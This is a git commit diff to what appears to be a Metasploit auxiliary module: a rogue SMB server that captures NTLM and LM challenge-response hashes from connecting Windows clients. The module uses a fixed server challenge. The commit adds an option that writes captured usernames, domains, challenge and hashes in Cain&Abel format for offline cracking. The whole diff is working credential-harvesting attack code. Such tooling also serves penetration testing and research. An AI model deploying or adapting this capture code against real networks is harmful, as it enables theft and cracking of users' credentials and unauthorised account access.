Add PWFILE for Cain&Abel compatibility (thanks grutz!)
git-svn-id: file:///home/svn/framework3/trunk@5966 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
5dda7392f9
commit
f54d91c53d
|
@ -52,12 +52,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
OptString.new('LOGFILE', [ true, "The local filename to store the captured hashes", "smb_sniffer.log" ])
|
OptString.new('LOGFILE', [ false, "The local filename to store the captured hashes", nil ]),
|
||||||
|
OptString.new('PWFILE', [ false, "The local filename to store the hashes in Cain&Abel format", nil ])
|
||||||
], self.class )
|
], self.class )
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def run
|
def run
|
||||||
|
@challenge = "\x11\x22\x33\x44\x55\x66\x77\x88"
|
||||||
exploit()
|
exploit()
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -100,7 +102,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
smb[:process_id] = pkt['Payload']['SMB'].v['ProcessID']
|
smb[:process_id] = pkt['Payload']['SMB'].v['ProcessID']
|
||||||
|
|
||||||
# The hardcoded challenge value
|
# The hardcoded challenge value
|
||||||
challenge = "\x11\x22\x33\x44\x55\x66\x77\x88"
|
challenge = @challenge
|
||||||
|
|
||||||
group = ''
|
group = ''
|
||||||
machine = smb[:nbsrc]
|
machine = smb[:nbsrc]
|
||||||
|
@ -221,23 +223,40 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
:type => "smb_domain",
|
:type => "smb_domain",
|
||||||
:data => smb[:domain]
|
:data => smb[:domain]
|
||||||
) if (smb[:domain] and smb[:domain].strip.length > 0)
|
) if (smb[:domain] and smb[:domain].strip.length > 0)
|
||||||
|
|
||||||
fd = File.open(datastore['LOGFILE'], "a")
|
|
||||||
fd.puts(
|
|
||||||
[
|
|
||||||
smb[:nbsrc],
|
|
||||||
smb[:ip],
|
|
||||||
smb[:username] ? smb[:username] : "<NULL>",
|
|
||||||
smb[:domain] ? smb[:domain] : "<NULL>",
|
|
||||||
smb[:peer_os],
|
|
||||||
nt_hash ? nt_hash : "<NULL>",
|
|
||||||
lm_hash ? lm_hash : "<NULL>",
|
|
||||||
Time.now.to_s
|
|
||||||
].join(":").gsub(/\n/, "\\n")
|
|
||||||
)
|
|
||||||
fd.close
|
|
||||||
|
|
||||||
|
|
||||||
|
if(datastore['LOGFILE'])
|
||||||
|
fd = File.open(datastore['LOGFILE'], "a")
|
||||||
|
fd.puts(
|
||||||
|
[
|
||||||
|
smb[:nbsrc],
|
||||||
|
smb[:ip],
|
||||||
|
smb[:username] ? smb[:username] : "<NULL>",
|
||||||
|
smb[:domain] ? smb[:domain] : "<NULL>",
|
||||||
|
smb[:peer_os],
|
||||||
|
nt_hash ? nt_hash : "<NULL>",
|
||||||
|
lm_hash ? lm_hash : "<NULL>",
|
||||||
|
Time.now.to_s
|
||||||
|
].join(":").gsub(/\n/, "\\n")
|
||||||
|
)
|
||||||
|
fd.close
|
||||||
|
end
|
||||||
|
|
||||||
|
if(datastore['PWFILE'] and smb[:username] and lm_hash)
|
||||||
|
fd = File.open(datastore['PWFILE'], "a")
|
||||||
|
fd.puts(
|
||||||
|
[
|
||||||
|
smb[:username],
|
||||||
|
smb[:domain] ? smb[:domain] : "NULL",
|
||||||
|
@challenge.unpack("H*")[0],
|
||||||
|
lm_hash ? lm_hash : "0" * 32,
|
||||||
|
nt_hash ? nt_hash : "0" * 32
|
||||||
|
].join(":").gsub(/\n/, "\\n")
|
||||||
|
)
|
||||||
|
fd.close
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
pkt = CONST::SMB_BASE_PKT.make_struct
|
pkt = CONST::SMB_BASE_PKT.make_struct
|
||||||
smb_set_defaults(c, pkt)
|
smb_set_defaults(c, pkt)
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue